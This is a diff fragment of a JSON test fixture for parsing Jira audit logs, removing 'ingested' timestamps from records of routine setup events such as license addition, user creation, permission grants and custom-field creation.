"type": [ "admin", @@ -395,7 +390,6 @@ }, "event": { "action": "jira.auditing.system.license.added", - "ingested": "2021-12-24T00:58:20.169933782Z", "original": "{\"affectedObjects\":[{\"id\":\"0\",\"name\":\"SEN-L17782970\",\"type\":\"LICENSE\"}],\"auditType\":{\"action\":\"New license added\",\"actionI18nKey\":\"jira.auditing.system.license.added\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"system\",\"categoryI18nKey\":\"jira.auditing.category.system\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"admin.license.organisation\",\"key\":\"Organization\",\"to\":\"myself\"},{\"i18nKey\":\"admin.license.date.purchased\",\"key\":\"Date Purchased\",\"to\":\"21/Nov/21\"},{\"i18nKey\":\"admin.license.type\",\"key\":\"License Type\",\"to\":\"Jira Software (Data Center): Evaluation\"},{\"i18nKey\":\"admin.server.id\",\"key\":\"Server ID\",\"to\":\"BGD5-PMSH-258I-VTTW\"},{\"i18nKey\":\"admin.license.sen\",\"key\":\"Support Entitlement Number (SEN)\",\"to\":\"SEN-L17782970\"},{\"i18nKey\":\"admin.license.user.limit\",\"key\":\"User Limit\",\"to\":\"Unlimited\"},{\"i18nKey\":\"jira-software\",\"key\":\"jira-software\",\"to\":\"-1\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539508,\"nano\":596000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -491,7 +485,6 @@ }, "event": { "action": "jira.auditing.user.created", - "ingested": "2021-12-24T00:58:20.169934600Z", "original": "{\"affectedObjects\":[{\"id\":\"JIRAUSER10000\",\"name\":\"test.user\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User created\",\"actionI18nKey\":\"jira.auditing.user.created\",\"area\":\"USER_MANAGEMENT\",\"category\":\"user management\",\"categoryI18nKey\":\"jira.auditing.category.usermanagement\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.username\",\"key\":\"Username\",\"to\":\"test.user\"},{\"i18nKey\":\"common.words.fullname\",\"key\":\"Full name\",\"to\":\"Alex\"},{\"i18nKey\":\"common.words.email\",\"key\":\"Email\",\"to\":\"test.user@example.com\"},{\"i18nKey\":\"admin.common.phrases.active.inactive\",\"key\":\"Active / Inactive\",\"to\":\"Active\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539609,\"nano\":600000000},\"version\":\"1.0\"}", "type": [ "user", @@ -587,7 +580,6 @@ }, "event": { "action": "jira.auditing.user.added.to.group", - "ingested": "2021-12-24T00:58:20.169935449Z", "original": "{\"affectedObjects\":[{\"name\":\"jira-administrators\",\"type\":\"GROUP\"},{\"id\":\"JIRAUSER10000\",\"name\":\"test.user\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User added to group\",\"actionI18nKey\":\"jira.auditing.user.added.to.group\",\"area\":\"USER_MANAGEMENT\",\"category\":\"group management\",\"categoryI18nKey\":\"jira.auditing.category.groupmanagement\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539609,\"nano\":734000000},\"version\":\"1.0\"}", "type": [ "group", @@ -662,7 +654,6 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-24T00:58:20.169936232Z", "original": "{\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Bulk Change\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.group\",\"key\":\"Group\",\"to\":\"jira-administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539609,\"nano\":750000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -738,7 +729,6 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-24T00:58:20.169937016Z", "original": "{\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Browse Users\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.group\",\"key\":\"Group\",\"to\":\"jira-administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539609,\"nano\":751000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -814,7 +804,6 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-24T00:58:20.169937821Z", "original": "{\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Create Shared Objects\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.group\",\"key\":\"Group\",\"to\":\"jira-administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539609,\"nano\":752000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -890,7 +879,6 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-24T00:58:20.169938827Z", "original": "{\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"auditType\":{\"action\":\"Global permission added\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Manage Group Filter Subscriptions\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.group\",\"key\":\"Group\",\"to\":\"jira-administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539609,\"nano\":754000000},\"version\":\"1.0\"}", "type": [ "admin", @@ -967,7 +955,6 @@ }, "event": { "action": "jira.auditing.user.added.to.group", - "ingested": "2021-12-24T00:58:20.169939647Z", "original": "{\"affectedObjects\":[{\"name\":\"jira-software-users\",\"type\":\"GROUP\"},{\"id\":\"JIRAUSER10000\",\"name\":\"test.user\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User added to group\",\"actionI18nKey\":\"jira.auditing.user.added.to.group\",\"area\":\"USER_MANAGEMENT\",\"category\":\"group management\",\"categoryI18nKey\":\"jira.auditing.category.groupmanagement\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539609,\"nano\":756000000},\"version\":\"1.0\"}", "type": [ "group", @@ -1042,7 +1029,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169940398Z", "original": "{\"affectedObjects\":[{\"id\":\"0\",\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Manage Sprints\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539617,\"nano\":138000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -1117,7 +1103,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169941136Z", "original": "{\"affectedObjects\":[{\"id\":\"0\",\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"Manage Sprints\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"\"},{\"from\":\"Project Role\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"\"},{\"from\":\"Administrators\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539617,\"nano\":158000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -1192,7 +1177,6 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-24T00:58:20.169941928Z", "original": "{\"affectedObjects\":[{\"id\":\"0\",\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Manage Sprints\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539617,\"nano\":162000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -1267,7 +1251,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:20.169942833Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10100\",\"name\":\"Team\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Team\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Team\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539618,\"nano\":318000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -1337,7 +1320,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:20.169943562Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10101\",\"name\":\"Parent Link\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Parent Link\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Parent Link\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539618,\"nano\":974000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -1407,7 +1389,6 @@ }, "event": { "action": "jira.auditing.customfield.updated", - "ingested": "2021-12-24T00:58:20.169944689Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10101\",\"name\":\"Parent Link\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field updated\",\"actionI18nKey\":\"jira.auditing.customfield.updated\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539618,\"nano\":990000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -1465,7 +1446,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:20.169945488Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10102\",\"name\":\"Target start\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Target start\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"The targeted start date. This custom field is created and required by Portfolio for Jira.\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Target start\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539619,\"nano\":224000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -1540,7 +1520,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:20.169946221Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10103\",\"name\":\"Target end\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Target end\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"The targeted end date. This custom field is created and required by Portfolio for Jira.\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Target end\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539619,\"nano\":266000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -1615,7 +1594,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:20.169946963Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10104\",\"name\":\"Original story points\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Original story points\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Original story points\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539619,\"nano\":313000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -1685,7 +1663,6 @@ }, "event": { "action": "jira.auditing.customfield.updated", - "ingested": "2021-12-24T00:58:20.169947694Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10102\",\"name\":\"Target start\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field updated\",\"actionI18nKey\":\"jira.auditing.customfield.updated\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539619,\"nano\":332000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -1743,7 +1720,6 @@ }, "event": { "action": "jira.auditing.customfield.updated", - "ingested": "2021-12-24T00:58:20.169948666Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10103\",\"name\":\"Target end\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field updated\",\"actionI18nKey\":\"jira.auditing.customfield.updated\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539619,\"nano\":340000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -1801,7 +1777,6 @@ }, "event": { "action": "jira.auditing.issue.type.created", - "ingested": "2021-12-24T00:58:20.169949419Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Epic\",\"type\":\"ISSUE_TYPE\"}],\"auditType\":{\"action\":\"Issue type created\",\"actionI18nKey\":\"jira.auditing.issue.type.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"issue types\",\"categoryI18nKey\":\"jira.auditing.category.issuetypes\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539619,\"nano\":485000000},\"version\":\"1.0\"}", "type": [ "creation" @@ -1864,7 +1839,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:20.169950144Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10105\",\"name\":\"Epic Name\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Epic Name\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Provide a short name to identify this epic.\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Name of Epic\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539619,\"nano\":522000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -1939,7 +1913,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:20.169950890Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10106\",\"name\":\"Epic Status\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Epic Status\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Epic Status field for Jira Software use only.\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Status of Epic\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539621,\"nano\":644000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -2014,7 +1987,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:20.169951970Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10107\",\"name\":\"Epic Colour\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Epic Colour\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Epic Colour field for Jira Software use only.\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Colour of Epic\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539621,\"nano\":669000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -2089,7 +2061,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:20.169952754Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10108\",\"name\":\"Sprint\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Sprint\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Jira Software sprint field\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Jira Sprint Field\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539622,\"nano\":694000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -2164,7 +2135,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:20.169953511Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10109\",\"name\":\"Epic Link\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Epic Link\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Choose an epic to assign this issue to.\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Epic Link Relationship\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539622,\"nano\":725000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -2239,7 +2209,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:20.169954331Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10110\",\"name\":\"Rank\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field created\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"fields\",\"categoryI18nKey\":\"jira.auditing.category.fields\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Rank\"},{\"i18nKey\":\"common.words.description\",\"key\":\"Description\",\"to\":\"Global rank field for Jira Software use only.\"},{\"i18nKey\":\"common.words.type\",\"key\":\"Type\",\"to\":\"Global Rank\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539622,\"nano\":794000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -2314,7 +2283,6 @@ }, "event": { "action": "jira.auditing.issue.type.created", - "ingested": "2021-12-24T00:58:20.169955062Z", "original": "{\"affectedObjects\":[{\"id\":\"10001\",\"name\":\"Story\",\"type\":\"ISSUE_TYPE\"}],\"auditType\":{\"action\":\"Issue type created\",\"actionI18nKey\":\"jira.auditing.issue.type.created\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"issue types\",\"categoryI18nKey\":\"jira.auditing.category.issuetypes\",\"level\":\"BASE\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539629,\"nano\":37000000},\"version\":\"1.0\"}", "type": [ "creation" @@ -2377,7 +2345,6 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-24T00:58:20.169955806Z", "original": "{\"affectedObjects\":[{\"id\":\"customfield_10111\",\"name\":\"Story Points\",\"type\":\"CUSTOM_FIELD\"}],\"auditType\":{\"action\":\"Custom field 